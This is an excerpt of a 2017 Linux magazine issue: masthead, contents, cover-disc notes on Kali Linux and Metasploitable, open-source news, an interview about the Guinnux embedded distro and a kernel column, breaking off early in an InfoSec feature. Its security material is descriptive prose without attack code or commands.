Page 1



• Intruder detection • Threat analytics • Malware screening

MONITOR SERVERS USING MUNIN Keep tabs on networks, servers and services


YOUR PI Get more from your GPIO pins now

How Erlang defines functions, atoms, tuples and more

MAKE A PI GAME Code your own egg drop game with the Pi and the SenseHAT


Which open source browser is the best?


» Inside Guinnux » Use your Pi as a warrant canary


Digital Edition


Discover vulnerabilities on your machine







Welcome to issue 174 of Linux User & Developer

Future Publishing Ltd Richmond House, 33 Richmond Hill Bournemouth, Dorset, BH2 6EZ +44 (0) 1202 586200 Web:

This issue


Editor April Madden 01202 586218

» Lock down your system » Power up your Pi » Understand exploits » Erlang explained

Senior Art Editor Stephen Williams Designer Rebekka Hearl Editor in Chief Dave Harfield Photographer James Sheppard Contributors Dan Aldred, Mike Bedford, Joey Bernard, Toni Castillo Girona, Sanne De Boer, Nate Drake, Tam Hanna, Oliver Hill, Phil King, Kushma Kumari, Jack Parsons, Swayam Prakasha, Richard Smedley, Jasmin Snook, Nitish Tiwari and Mihalis Tsoukalos Advertising Digital or printed media packs are available on request. Head of Sales Hang Deretz 01202 586442 Account Manager Luke Biddiscombe

International Linux User & Developer is available for licensing. Contact the International department to discuss partnership opportunities. Head of International Licensing Cathy Blackman +44 (0) 1202 586401

Subscriptions For all subscription enquiries: 0844 249 0282 Overseas +44 (0)1795 418661 Head of subscriptions Sharon Todd


Circulation Circulation Director Darren Pearce 01202 586200

Production Production Director Jane Hawkins 01202 586200

Look for issue 175 on 9 Feb. Want it sooner? Subscribe today!

Management Finance & Operations Director Marco Peroni Creative Director Aaron Asadi Editorial Director Ross Andrews Printing & Distribution William Gibbons, 26 Planetary Road, Willenhall, West Midlands, WV13 3XT Distributed in the UK, Eire & the Rest of the World by Marketforce, 5 Churchill Place, Canary Wharf, London, E14 5HU 0203 787 9060

Distributed in Australia by Gordon & Gotch Australia Pty Ltd, 26 Rodborough Road, Frenchs Forest, New South Wales 2086 + 61 2 9972 8800

Welcome to the latest issue of Linux User & Developer, the UK and America’s favourite Linux and open source magazine. We all worry about security. As Linux users we have less chance of our personal machine being co-opted into a botnet, but that doesn’t mean that if it picks something up it can’t merrily forward it on to its Windows-based brethren. Then there are the risks inherent to networks and to the Internet of Things, many based on Linux but made up of mixed architectures. We can’t rely on Windows, Android or even Apple devices to look after themselves; we know how easy it can be to circumvent their protections. Only Linux offers the degree of lockdown and the testing tools we need to achieve a reasonable level of security for our machines, networks and data. We take an in-depth look at these tools and at pro techniques for using them on p18, and you’ll also find them on the disc that accompanies the magazine (digital edition readers can find them on our FileSilo repo). Meanwhile on p58 we’ll show you how to power up your Pi with some clever interfacing and electronic tricks. You’ll learn how to get more from your GPIO pins and how to work around power limits safely to supercharge your Pi projects. Plus the rest of the issue is packed with tutorials on security, programming, admin and more. Enjoy the issue! April Madden, Editor


The publisher cannot accept responsibility for any unsolicited material lost or damaged in the post. All text and layout is the copyright of Future Publishing Ltd. Nothing in this magazine may be reproduced in whole or part without the written permission of the publisher. All copyrights are recognised and used specifically for the purpose of criticism and review. Although the magazine has endeavoured to ensure all information is correct at time of print, prices and availability may change. This magazine is fully independent and not affiliated in any way with the companies mentioned herein. If you submit material to Future Publishing via post, email, social network or any other means, you automatically grant Future Publishing an irrevocable, perpetual, royalty-free licence to use the material across its entire portfolio, in print, online and digital, and to deliver the material to existing and future clients, including but not limited to international licensees for reproduction in international, licensed editions of Future Publishing products. Any material you submit is sent at your risk and, although every care is taken, neither Future Publishing nor its employees, agents or subcontractors shall be liable for the loss or damage.

© 2017 Future Publishing Ltd ISSN 2041-3270

Get in touch with the team: Facebook:

Linux User & Developer


Buy online


Visit us online for more news, opinion, tutorials and reviews:


Contents

Subscribe & save! See page 32

Check out our great new offer! US customers can subscribe on page 56

Reviews 81 Web browsers

Is Chrome still the cream of the crop when it comes to web browsing?

18 Lock down your system

Master InfoSec skills to secure and test systems and networks




OpenSource | Tutorials

08 News

The biggest stories from the open source world

12 Interview

John Eigelaar on the Guinnux distro

16 Kernel column

The latest on the Linux kernel with Jon Masters

34 Bash masterclass: Combine shell scripts and charts

Transform your textual information into attractive diagrams with gnuplot and Bash

38 Analyse, adjust and run exploits in a controlled environment

Learn how exploits work and how you can use this knowledge against them

42 Monitor your network with Munin

Learn how to install and configure Munin on a Linux system to monitor networks

46 Program in Erlang: Functions

Discover Erlang functions and basic Erlang data types

52 Manage user accounts in Ubuntu

Learn how to effectively manage user accounts, permissions, groups and more

86 Solwise PL-1200AV2-PIGGY

Does this Powerline adaptor give you the internet speeds it promises?

88 Fedora 25

Can Fedora’s latest update turn the tables on the competition?

90 Free software

Richard Smedley recommends some excellent FOSS packages for you to try


18 Lock down your system

Learn and apply essential InfoSec techniques

57 Practical Raspberry Pi

58 Secrets of Pi interfacing

Get more from your GPIO pins and power up your Pi. Learn how to get more from your GPIO pins, build a Pi air drum, code an egg-drop game, set your Pi up as a tweeting warrant canary and set up a Pi photo frame

96 Free downloads

Find out what we’ve uploaded to our secure repo FileSilo for you this month

Join us online for more Linux news, opinion and reviews



£4.99/month* excl. 20% VAT

Trusted Performance. Intel® Xeon® processors.

NEW 1&1 eliminates the "noisy neighbour effect": Ideal for beginners as a web and mail server, but also for more demanding projects like database applications, the new 1&1 Virtual Server Cloud is 100% yours to use! Take advantage now of the latest cloud technology. No shared resources through VMware virtualisation ■ Full root access ■ SSD storage ■ Unlimited traffic ■ High performance

Maximum security ■ Best price-performance ratio ■ 24/7 expert support ■ Choice between Linux/Windows ■ Plesk ONYX









0333 336 5509 * 1&1 Virtual Server Cloud S: £4.99/month. Billing cycle 1 month. Minimum contract term 12 months. No setup fee. Following the offer period, subsequent periods will be charged at the renewal price. Prices exclude 20% VAT. Visit for full product details, terms and conditions. Windows® and the Windows® logo are registered trademarks of Microsoft ® Corporation in the United States and/or other countries. 1&1 Internet Limited, Discovery House, 154 Southgate Street, Gloucester, GL1 2EX.

Open Source On the disc

On your free DVD this issue

Find out what’s on your free disc

Welcome to the Linux User & Developer DVD. This issue we’re all about InfoSec as we help you to test your security, lock down your systems and networks, and even explore a deliberately vulnerable VM to learn more about threats and how to counter them. Inside our live-booting distros you’ll also be able to access all the FOSS from our InfoSec feature and keep your systems and data completely watertight.

Featured software:

Kali Linux The ultimate security testing distro for Linux users will help you to make your system and network watertight. Use it to access the software in our InfoSec feature and to test your systems and networks for the ultimate in secure computing. Please note that the default login for the live boot edition of Kali Linux is username: root; password: toor.


IPFire

A professional and hardened Linux firewall distribution that is secure, easy to operate and has great functionality. Please note that you will need to install IPFire from the live booting disc, so ensure that you have backed up all of your data and partitioned your drive before installing, to avoid losing any of your information or partitions.

Load DVD

To access software and tutorial files, simply insert the disc into your computer and double-click the icon.

Live boot

To live-boot into the distros supplied on this disc, insert the disc into your disc drive and reboot your computer.

Please note: • You will need to ensure that your computer is set up to boot from disc (press F9 on your computer’s BIOS screen to change Boot Options). • Some computers require you to press a key to enable booting from disc – check your manual or the manufacturer’s website to find out if this is the case on your PC. • Live-booting distros are read from the disc: they will not be installed permanently on your computer unless you choose to do so.

For best results: This disc has been optimised for modern browsers capable of rendering recent updates to the HTML and CSS standards. So to get the best experience we recommend you use: • Internet Explorer 8 or higher • Firefox 3 or higher • Safari 4 or higher • Chrome 5 or higher

Metasploitable

Metasploitable is an intentionally vulnerable Linux virtual machine. This VM can be used to conduct security training, test security tools, and practise common penetration testing techniques. As it is deliberately insecure, please make sure that you don’t store any of your sensitive or personal data on a partition or VM running Metasploitable.

Problems with the disc?

Send us an email at linuxuser@ Please note, however, that if you are having problems using the programs or resources provided, please contact the relevant software companies.

Disclaimer

Important information

Check this before installing or using the disc For the purpose of this disclaimer statement the phrase ‘this disc’ refers to all software and resources supplied on the disc as well as the physical disc itself. You must agree to the following terms and conditions before using ‘this disc’:

Loss of data

In no event will Future Publishing accept liability or be held responsible for any damage, disruption and/or loss to data or computer systems as a result of using ‘this disc’. Future Publishing makes every effort to ensure that ‘this disc’ is delivered to you free from viruses and spyware. We do still strongly recommend that you run a virus checker over ‘this disc’ before use and that you have an up-to-date backup of your hard drive before using ‘this disc’.


Hyperlinks

Future Publishing does not accept any liability for content that may appear as a result of visiting hyperlinks published in ‘this disc’. At the time of production, all hyperlinks on ‘this disc’ linked to the desired destination. Future Publishing cannot guarantee that at the time of use these hyperlinks direct to the same intended content, as Future Publishing has no control over the content delivered on any of these hyperlinks.

Software Licensing

Software is licensed under different terms; please check that you know which one a program uses before you install it.

Live boot


Insert the disc into your computer and reboot. You will need to make sure that your computer is set up to boot from disc


Free and open-source software needs to be installed via the distros or by using the disc interface

Distros can be live booted so that you can try a new operating system instantly without making permanent changes to your computer


Alternatively you can insert and run the disc to explore the interface and content

• Shareware: If you continue to use the program you should register it with the author • Freeware: You can use the program free of charge • Trials/Demos: These are either time-limited or have some functions/features disabled • Open source/GPL: Free to use, but for more details please visit gpl-license Unless otherwise stated you do not have permission to duplicate and distribute ‘this disc’.


08 News & Opinion | 12 Interview | 96 FileSilo


Raspberry Pi gets a serious speed boost

Connectivity improvements could usher in a new wave of IoT developments

We all know that the Raspberry Pi has long been heralded as the best single-board computer made for public use, partially due to the continuous updates that have been implemented into it and its wallet-friendly price tag. One of the caveats, however, has long been its reliance on Wi-Fi connectivity, a specific problem for those looking to start developing for the Internet of Things. However, in a recent update, it has been announced that Raspberry Pi 3 owners will soon be able to take full advantage of LTE connectivity on their units. The Pi 3 will soon be able to handle low-throughput cellular communications, a massive boost for development practices. Developing the chipset is Altair Semiconductor, previously known for its developments in LTE chipsets, many of which have been implemented into everyday items. “We are dedicated to providing low-cost, high-performance computers to connect people, enable them to learn, solve problems and have fun,” said Eben Upton, CEO of Raspberry Pi (Trading) Ltd. “Altair has long been regarded as an LTE connectivity leader, and we are pleased to collaborate on this trial, which is the first of its kind. Users will only benefit by having the choice of using BT, Wi-Fi or LTE.” Due to the limitations involved with Wi-Fi networks, the addition of Altair’s LTE chipset should help provide wider and more flexible coverage. When implemented correctly, users will be able to stream high-definition video from anywhere, while also establishing connections with other applications and home automation products. The new chipset features downlink speeds of up to 10Mbps and offers extremely low power consumption, which blends in well with the Pi’s low-resource demands. It’s also completely software upgradable, with updates expected to help bridge the connection between

Above LTE connectivity will soon be a major part of the Pi

Pi and IoT devices even further. Also touted to be showcased in the chipset will be an advanced power management unit, a low power CPU subsystem and integrated DDR memory with a strong security framework. “The integration of Altair’s LTE chipset with Raspberry Pi makes it one of the most portable, affordable, and practical connectivity solutions on the market,” said Eran Eshed, co-founder and VP of worldwide sales and marketing at Altair. “More than 10 million Raspberry Pis have now been sold to date, and we’re pleased to debut this proof-of-concept to extend its range and value.” The integration of the chipset is said to be a gradual process, but if history is anything to go by, we can expect all units to be shipping with this option readily available in the first half of 2017. It’s likely we’ll also see the development of LTE brought forwards into all future models of the Raspberry Pi. If you’re not one of the 10 million owners of a Pi unit, you can head across to for all pricing and shopping options.


Best distros for ethical hacking practices

1 Kali Linux

Although it flies under the radar, Kali Linux comes with over 600 pre-installed pen testing tools that majorly enhance your security toolbox. The tools are highly flexible and many are updated regularly. Best of all, they can easily be deployed on different platforms, including both ARM and VMware.


Compiling code just got easier

2 Pentoo Linux

Based on Gentoo, Pentoo can be cleverly used on top of any existing Gentoo installation. Its array of tools vary from exploits to database scanners, equipping you with everything you need to put your security to the test.

The Red Hat Developer Toolset gets a major update

Getting that combination of a stable operating system with the latest development tools is never an easy feat, so it’s testament to Red Hat’s endeavours that its Developer Toolset is reaching its sixth major update. For those unaware, the Red Hat Developer Toolset’s primary aim is to help streamline application development by enabling developers to get hands-on with the latest open-source C and C++ compilers and profiling tools. Through these tools, developers can then compile applications and deploy them across multiple versions of Red Hat Enterprise Linux. A key part of this sixth update is its expansion onto even more architectures. These include Red Hat Enterprise Linux on x86 systems, RHEL for z Systems and the ARM Developer Preview of RHEL as well. Avid users will find new tools and updates to take advantage of that form the basis of the Developer Toolset and the subsequent Red Hat Software Collections. The likes of PHP, Python, Ruby and MongoDB have all seen significant updates, while Git 2.9, the open-source version control system, makes its debut in the toolset.

Other new additions include the appearance of the Redis 3.2 and MySQL 5.7 open-source databases, as well as a new JVM monitoring tool in Thermostat 16. Eagle-eyed users will also find the latest stable version of Eclipse Neon included, an ideal solution for those interested in the latest tools within the Eclipse integrated development environment. Toolset-specific updates are also in abundance in order to really take this toolkit above and beyond what the competition offers. Both the GNU Compiler Collection and the GNU Project Debugger have been updated to their latest versions, while numerous toolchain components and performance tools, namely Dyninst and Valgrind, have been enhanced. In its current state, the toolset is available to all members of the Red Hat Developer Program, as well as those who currently have a select RHEL subscription. Later this year, a free RHEL developer subscription will also be offered to those who have yet to take the plunge, but at the time of writing, it’s unknown what sort of terms this will be available under.

3 Parrot Security OS

One of the best things about Parrot is just how lightweight it is, making it a viable choice for those running old or slow hardware. It doesn’t skimp on features, however, and you’re bound to find every penetration tool you could possibly need.

4 DEFT Linux

As far as digital forensics go, you can’t look past DEFT Linux. It comes with a staggering amount of forensic tools, which are particularly tailored for penetration testers. It’s also based on Ubuntu, which helps in its customisation.

5 Caine

Caine is the best on this list when it comes to combining everyday distro applications, such as a browser and email client, with a highly complex forensic suite. It performs both functions well and can be run from either live or hard disk.



Your source of Linux news & views


SteamOS 2.97 fixes Steam Controller compatibility woes

This latest update provides essential bug fixes for gamers

Valve has recently launched the stable SteamOS 2.97 maintenance update, almost five months since its previous release, SteamOS 2.87. Behind the scenes, SteamOS is still in the development phase when it comes to being synchronised with the Debian stable repositories, but the latest 2.97 update bridges the gap further with the inclusion of BIND9, cURL and GStreamer Bad Plugins 1.0. Having both SteamOS and Debian in full sync will help guarantee that the gaming client receives the newest security fixes that are being implemented in the Debian operating system at the same time. In recent updates, Linux forums have been rife with compatibility issues regarding the Steam Controller, but new additions should help put the issue to rest. A newly implemented X.Org server now ignores joystick devices, which in turn prevents controller and mouse inputs being confused for one another. Initial public feedback has shown this to be a big help for those suffering from the issue found in the previous beta clients. Under the hood, SteamOS 2.97 ships with an array of security updates for the libxslt, tzdata and GNU Tar packages, providing each with the latest fixes and plugs. Lastly, the firmware-ralink packages have been re-introduced, which has helped the unattended-upgrade functionality flourish once again. It was a sorely missed feature in previous beta updates, so we’re glad to see it back in action. Valve has gone on record to say that it highly recommends users update their SteamOS client to the latest 2.97 version as soon as possible. Those looking to update should head across to the Steam Universe group over at for all necessary installation images.

Above The Steam Controller now works flawlessly in SteamOS


Microsoft and Google make open source commitments

Although in recent months Microsoft has upped its game when it comes to supporting the world of open source, and to some degree Linux, it has now officially become the latest high-profile member of the Linux Foundation. Despite its long history in closed-source software, members of Microsoft have gone on record to say that the partnership will help the Redmond giant develop and deliver new mobile and cloud experiences to more people than ever before. Microsoft has recently been praised for publishing source code repositories, a big step up from a few years ago, but even more impressive is its work when collaborating with the open source community. Recently it has been seeking community consensus in many key development projects, with consumer feedback helping to shape its open-source future. Just as surprising to some will be the announcement of Google joining the .NET Foundation as part of the ever-increasing Steering Group. Despite Google’s interests in Java, the move is seen as a way for it to help improve .NET support for its own Google Cloud platform. Going forward, it’s unknown how Google will be able to help move .NET forward with its plans, especially when it comes to Google’s investments in the heavily Java-based Android platform. Could we expect to see Visual Studio make it over to Android at some point? Who knows… Both Microsoft and Google’s announcements may come as a surprise, but it’s testament to the developments in the open-source community that have helped pave the way for these partnerships to take place.


Western Digital unveils Pi-compatible hard drive range

Storage options are plentiful for Pi users around the world

Western Digital has long been a pioneer in making storage more accessible for users all over the world. Its latest announcement sees the introduction of a new kit to help equip your Raspberry Pi with a hard drive storage solution. Named the WD PiDrive Foundation Edition, the hard drive comes equipped with a complete custom software build, closely based on the Raspbian OS and the NOOBS OS installer. For end users, this combination provides a quick and simple installation of Raspbian PIXEL and Raspbian Lite onto the drive itself. The drive is offered in three capacity versions: a 64GB flash drive, a 250GB disk drive and a 375GB disk drive. Both of the bigger capacity options include a WD PiDrive cable, a unique cable that provides an optimal powering option for both the hard drive and the Raspberry Pi simultaneously. Due to the increased space of a hard drive over a microSD card, the traditional storage option for Pi users, WD has implemented an exclusive feature called Project Spaces. This allows for the installation of up to five core operating systems, partitioning off areas of the hard drive for each one, and empowering Pi users with a vast array of choices. Versions of the WD PiDrive start at just $18.99 over at the official site.

Top 10 (Average hits per day, 15 Nov–15 Dec)

1. Linux Mint 2,629
2. openSUSE 1,708
3. Debian 1,707
4. Zorin 1,374
5. Ubuntu 1,324
6. Fedora 1,298
7. Manjaro 1,271
8. Elementary 881
9. Deepin 862
10. Antergos 806

This month ■ Stable releases (19) ■ In development (9)


Node.js Foundation implements new security project

The popular open-source application programming framework continues to grow

In an attempt to consolidate and improve overall security levels in its ever-popular open-source programming framework, Node.js has implemented its own Node.js Security Project into the mix. The Node.js Security Project was initially set up to help collect information about the vulnerabilities that Node users most commonly face. As a direct part of the Node.js Foundation, it’ll be used to help plug exploits and identify core weaknesses within the framework. Another major role of the Node.js Security Project is to help manage the module ecosystem that the framework has been famed for. Over the past 12 months, the module system has nearly quadrupled in size, and as with any developments of this kind, security needs to be paramount. Forums have been rife with bugs, so this additional security layer could prove to be a game changer. It’s expected that the merge will take place gradually over a period of time, with security protocols being implemented throughout the framework and introduced to users fairly quickly.

The release of Fedora 25 has helped spark some major interest back into the distribution, with it gaining a new wave of users and enticing back those who had previously deserted it.

Highlights

elementary OS

Despite the 0.4 Loki update being released over five months ago now, new users are still flocking over to elementary OS. Its combination of strong usability mixed in with great design is proving to be hard to match.


Linux Mint

The 18.1 beta of Linux Mint has helped it maintain its spot at the top of the download list. Its biggest addition is a new screensaver with built-in playback controls; it’s pretty good!


Fedora

It’s hard not to be impressed with what Fedora has achieved with the 25th update. Workstation in particular is fast becoming one of the premier distributions for new and seasoned users alike.

Latest distros available:





A new face for Arch

Guinnux makes Arch Linux woes a thing of the past. Founder John Eigelaar details how his revolutionary distribution took shape

John Eigelaar

is the founder and director of Keystone Electronic Solutions. Based in South Africa, he’s at the forefront of the Guinnux distribution, as well as a series of Guinnux-based hardware.

How long has Guinnux been in development? Where did the original idea for it come from?
Guinnux started in 2010 as a buildroot project. We soon realised the similarities between embedded installations and Linux server deployments in terms of their requirements, and that both needed to be predominantly unattended. On top of that, we aimed to help promote a structured development environment. That’s where many of Guinnux’s aims came from. Furthermore, buildroot was not flexible enough to move away from uClibc and to deploy new solutions on top of existing frameworks. Deploying new images instead of staged updates to sites is not viable when you have hundreds and thousands of sites. As you can imagine, keeping all of this development and the runtime environment in sync ended up becoming a full-time job. Since then, we’ve been able to enhance and build upon the principles that Guinnux was based on to create the project and distribution you see today.

For our readers who may be unaware of the Guinnux distribution, could you give us an overview of what it is and its key features?
Keystone Electronic Solutions’ enterprise embedded Linux – dubbed Guinnux – is based on

Arch Linux ARM. It is developed and maintained by us and makes it easy to construct custom packages and solutions. It adopts the Arch Linux way of doing things, but with much-needed extras. Don’t get me wrong, there’s a lot of great things about Arch Linux, but it can be overly complicated when it really doesn’t need to be. So it was our aim to make it more accessible and considerably expand on its feature set. The Guinnux rescue file system allows users to boot into flash should the embedded system fail, and allows for simple system recovery – we’ve had a lot of positive feedback about this so far. The system can be recovered without having to reflash an image – a useful addition that saves more than just time! In fact, it is essential for enterprise deployments to recover and more surprisingly, it’s a feature that is often left out of many other enterprise-based distributions. Other features myself and the team have been working on include adapting the boot loader so users are able to boot kernels from any external file system. This allows for Keystone to distribute and upgrade kernel packages from anywhere and at any time, without interrupting service. Users can also find a ton of extra information about Guinnux over on our official Wiki page: doku.php. What makes Guinnux truly unique compared to other embedded Linux distributions? Guinnux is the first embedded GNU/Linux distribution that emulates the proven workflow of Enterprise Linux solutions. We’ve looked to blend all that is great with enterprise distributions – of which there’s a lot – with the core stabilities and improvements that we’ve introduced in Guinnux. Users will also find Guinnux as a headless enterprise embedded Linux distribution, but [it] still provides a mature and stable development environment for all our users. We’ve also looked to offer a comprehensive networking and protocol compatibility suite, something that many of our

Getting acquainted with the Guinnux Starter Kit The Guinnux Starter Kit aims to be a one-stop shop for everything you could possibly need to start developing with Guinnux. It serves as an entry point for the evaluation of both the runtime and development environments that Guinnux offers its users. The kit itself consists of a ARM9-based development board, a 5V external power supply and a microSD card for use with the board. This development board includes a number of IO interfaces, such as RS232 Serial, USB 1.1 Host, 10MB LAN and room for a IO expansion connector as well. Other specifications include 64MB SDRAM and battery backed RTC. The latest version of Guinnux comes pre-programmed onto the board, with the accompanying ext4 root file system booted and loaded onto the microSD card. Extra binary and system images are available for download from the official Guinnux site. By standard, the root file system contains every single core utility to remotely access and customise the Guinnux development board, so expect to things like the OPKG Package Manager and the openSSH server among others. Interested parties can get their hands on the Guinnux Start Kit over at



Your source of Linux news & views

competitors are traditionally slow at undertaking. Away from that, Guinnux also provides built-in system recovery and failsafe mechanisms as standard, as well as OTA updates with minimal downtime. For newer users, we’ve also made sure Guinnux works instantly out of the box, providing hassle-free deployment and a pre-installed standard web-based configuration interface. Our final standout option is the pacman package management system, which combines a simple binary package format with an easy-to-use build system. The goal of pacman is to make it possible to easily manage packages, whether they are from the official repositories or the user’s own package builds. How much of the distribution is core Arch Linux? Has there been a lot of modifications to it? Almost all of it is core Arch. We tied the core components together to allow for the development of enterprise solutions on top of the Arch Linux system. Our main focus was to allow more applications to be deployed onto the core. We added components that are expected from embedded distributions, such as a web config site and modules/libraries


Bringing Guinnux to the Pi

One of the most interesting things to have come from the development of Guinnux is that it now works with a number of third-party boards. While there’s a lot of interest in porting Guinnux across to the BeagleBone Black board, most users will want to familiarise themselves with the distribution on the Raspberry Pi. Guinnux is made available on the Pi through a NOOBS OS image, but with a twist. Unlike other NOOBS images, Guinnux first installs the fallback rescue system, which in turn is used to download and install the base Guinnux packages. For end users, this keeps download and install times to an absolute minimum. Of course, users also have the option to download the NOOBS image directly onto an SD card and install Guinnux that way, but the process is vastly more complicated. Once Guinnux is up and running on the Pi, users can get stuck into a full web-based configuration interface, which can be tailored to meet their exact needs and help optimise what the Pi can handle.

to control embedded hardware. As I mentioned previously, Arch can be a tricky distribution to get your head around, so we wanted to make it a more appealing proposition to potential new users. We’d like to think we’ve done a good job of that.

We heard that your team made some changes to the build tools within Arch Linux. What sort of changes were these?

We made the makepkg utility (among others) cross-compile compatible. This differs from the usual approach of performing clustered builds. The produced packages are also seamlessly integrated into the toolchain through a modified pacman utility, such that you manage your toolchain as you would a normal distribution.

Your site also shows some Guinnux-based hardware. Are these good choices for both


new and advanced Linux users? Are they more relevant to companies or makers?

Guinnux is well suited to our own Blue Penguin board, as this was the main development platform for Guinnux. The Blue Penguin module is field-tested and is used in multiple enterprise solutions. It is perfect for companies that want to produce a serious industrial-strength embedded platform. However, we also recognise that there is a market for makers, and that is why we ported Guinnux to the Raspberry Pi and are currently also porting it to the BeagleBone Black board. We’re always looking at new ways we can entice new users to try out Guinnux, so being able to run on other boards is a big part of that. Hopefully we can continue to port it across to other platforms in the near future.

What do you see as the future of Guinnux going forward? How active do you think the development cycle will be?

Guinnux will continue to keep up with the mainstream Linux distributions to keep the embedded environment close to the PC environment. This greatly improves the development experience. Releases are planned to occur annually, depending on the changes we feel need to be implemented at the time. We are constantly adding features as we require them, and we welcome the Linux community to join in development over on our website and forums.





The kernel column

Jon Masters summarises the latest happenings in the Linux kernel community

Jon Masters

is a Linux kernel hacker who has been working on Linux for some 19 years, since he first attended university at the age of 13. Jon lives in Cambridge, Massachusetts, and works for a large enterprise Linux vendor, where he is driving the creation of standards for energy-efficient ARM-powered servers.


Linus Torvalds announced the release of the 4.9 Linux kernel, noting that it “is the biggest release we’ve ever had, at least in number of commits.” In fact, the numbers aren’t even close. With over 16,000 changesets (3,000 more than the previous cycle), Linux 4.9 is the biggest kernel release in some time. Each of those changesets represents a group of patches, many of which will have had a number of iterations and reviews during development. All of which explains why Linus decided to wait an extra week after a (rare) RC8 before pushing the final kernel out the door.

The latest kernel includes a number of new features that we have covered in previous issues, including support for Intel’s Memory Protection Keys, and Andy Lutomirski’s work on virtually mapped kernel stacks. The latter will increase the kernel’s resilience against a number of corner-case problems, such as overflowing the (fixed-size) kernel stack in extremely rare code paths, or some of the more obscure forms of security compromise. In fact, CONFIG_VMAP_STACK has already led to a number of additional cleanups, including better support for virtual address debugging, and the identification of a longstanding bug in the kernel’s handling of old-fashioned 32-bit-only x86 processors during processor exceptions. Meanwhile, Intel’s Memory Protection Keys aim to guard against certain forms of buffer overflow and other security problems, while also providing a means to isolate certain sensitive memory regions (such as those containing private keys used for cryptography).

Other features in 4.9 include the usual raft of driver updates, including support for the greybus subsystem as used by the (discontinued) Google Project Ara that we have covered previously as well. Finally, a hardware latency detector originally hacked together many years ago by this author (since rewritten more cleanly by another) to diagnose problems with real-time Linux systems has finally been merged (see the new hwlat tracer).
Linus had originally intended for the 4.9 kernel to be released a week earlier, but by 4.9-rc6 he was hinting at a potential delay. This was confirmed when he added an (unusual) 4.9-rc8, noting that things had not yet calmed down enough for him to be confident in a final release. All of this means that the timing for Linux 4.10 will be awkward to say the least, with the merge window closing on Christmas Day. Linus did note, however, that this is “a pure technicality, because I will certainly stop pulling on the 23rd at the latest, and if I get roped into Christmas food prep, even that date might be questionable.”

More security exploits

Three more critical security issues affecting the Linux kernel have been announced over the past month. The most serious of these was CVE-2016-8655, ‘Linux af_packet.c race condition (local root)’, in which a carefully crafted sequence of software calls into the unprivileged namespaces code (used by containers on many distributions) could be used to cause the kernel to perform a ‘use after free’ type access to memory under the control of the attacker, and thus cause escalation of privilege to that of the root user. The original discovery of this problem was reported by Philip Pettersson, who noted that he “found the bug by reading code paths that have been opened up by the emergence of unprivileged namespaces, something I think should be off by default in all Linux distributions.” Many of these namespace changes have been made in the interest of supporting Linux containers, but some of them have broken previous assumptions that particular operations were privileged, and were thus perhaps less subject to the kind of code audit that Philip has undertaken here.

On the face of it, we seem to be experiencing a wave of security bugs affecting the Linux kernel these days. But in part, this is because such exploits now often come with memorable, cute-sounding names, blogs, Twitter handles, and corporate PR teams keen to promote their service of discovering the problem to begin with. This drives greater attention to security (which isn’t necessarily a bad thing). At the same time, Linux is now an incredibly enticing target for those up to mischief (or just out for a PR opportunity). In many ways, in terms of high-value targets, there is more to be gained from compromising Linux than there is from compromising Windows or Mac OS.

Heterogeneous memory management

One of the more interesting trends in hardware is toward sharing memory between devices and system applications processors (CPUs) in more homogenous and transparent ways. The utopia that we are all hoping will come soon is in the form of coherently

attached devices that participate in system-wide cache coherency protocols and become instantly aware of any changes made to memory by any other agent or processor within the machine. When we reach this stage of evolution, it will (theoretically) be possible to build software abstractions that treat code running on GPUs, FPGAs and other accelerators attached to a machine as if they were regular processes. But we’re a little way away from utopia today.

Until quite recently, data shared between GPUs (as an example) and system RAM had to be quite explicitly managed, with many extraneous copies of large areas (buffers) of memory as they were passed back and forth. Some of the latest hardware on the market greatly improves the status quo. For example, Nvidia’s Pascal GP100 supports the ability to trigger page faults in unified memory shared between the GPU and the system. This means that the kernel can maintain a consistent mechanism to manage memory, whether it is system RAM or device graphics memory, using the standard page table abstraction to translate from the virtual addresses used by software (applications on the host Linux system, and code running on the GPU) to the underlying physical memory, which might be located in RAM or on the GPU. Because devices like the GP100 can trap on a fault, they can allow the kernel to manage and coordinate ownership behind the scenes.

This is a feature that is leveraged by the HMM (Heterogeneous Memory Management) patch series from Jérôme Glisse to provide a generic kernel mechanism. The code has been under development for several years (since at least 2014), but there was some resistance to merging it before the upstream maintainers could see real-world hardware use cases for it. There are now several devices shipping that can leverage HMM, including both the Nvidia Pascal, as well as the Mellanox CX5 network adapter cards. The latest version of the patch series (v14) seems to be very close to a final form.
The question is whether the presence of shipping hardware, and the endorsements of those building it, will allow this now to be finally merged.

The future of third-party driver support

Linux is famous in developer circles for several fundamental tenets. One of these is that “you don’t

break userspace”. Another is that “there is no kernel ABI”. The latter means that, unlike other proprietary (and some other open source) operating systems, Linux doesn’t guarantee stable internal interfaces between the components inside the kernel (as opposed to those visible to applications). This is the reason that those who use proprietary graphics drivers on Linux must update them every time a new upstream kernel is released, for example. The kernel doesn’t guarantee that the interfaces needed for drivers won’t change radically from one release to the next. Any such changes are typically viewed as being self-contained, and impacted code is usually updated whenever other infrastructure changes are made within the Linux kernel source.

Yet for many years, a compromise situation has existed in which a Linux kernel could be built with MODVERSIONS support. This is a feature that allows the kernel to automatically determine the interfaces used by a driver and (at a broad level) whether they remain compatible with those provided by the currently running kernel. It is often used in the commercial Linux distributions, which use it to provide limited support for third-party drivers, or updates that didn’t ship with the OS.

A recent change to the upstream Linux kernel, intended to allow the use of EXPORT_SYMBOL (a macro used to make kernel functions available across the kernel) within assembly code, broke kernel module versioning due to a problem with the assembler (binutils) used in compiling the Linux kernel. A workaround was merged for 4.9, but it led to a debate in which Linus said, “Some day I really do want to remove MODVERSIONS entirely. Sadly, today does not appear to be that day.” It will be interesting to see what, if anything, directly replaces the functionality required to use third-party (even open source) drivers if that day does come.



Lock down your system

Download and use some of the most popular security tools and distros to probe and secure your network within minutes



TRIAD

Confidentiality

When discussing InfoSec, it is a given that private data should be just that. Confidentiality encompasses obvious steps to keep data safe, such as storing it offline, encryption and the use of 2FA (two-factor authentication). Confidentiality also pertains to people. Anyone with access to sensitive data should be trained to avoid security risks by choosing strong passwords, staying alert to social engineering attacks, and following clear privacy guidelines.



Hardening. Penetration. Remote exploits. Least privilege. The number of buzzwords and terms related to InfoSec (information security) is almost as great as the number of tools out there, each of which boasts that it’ll analyse your network for any potential threat and/or secure it against hackers. In this guide, we will examine some of the network security community’s favourite tools, as well as detail the specific threats they address. One of the central tenets of network security is to reduce your ‘attack surface’ by removing unnecessary software. For this reason,

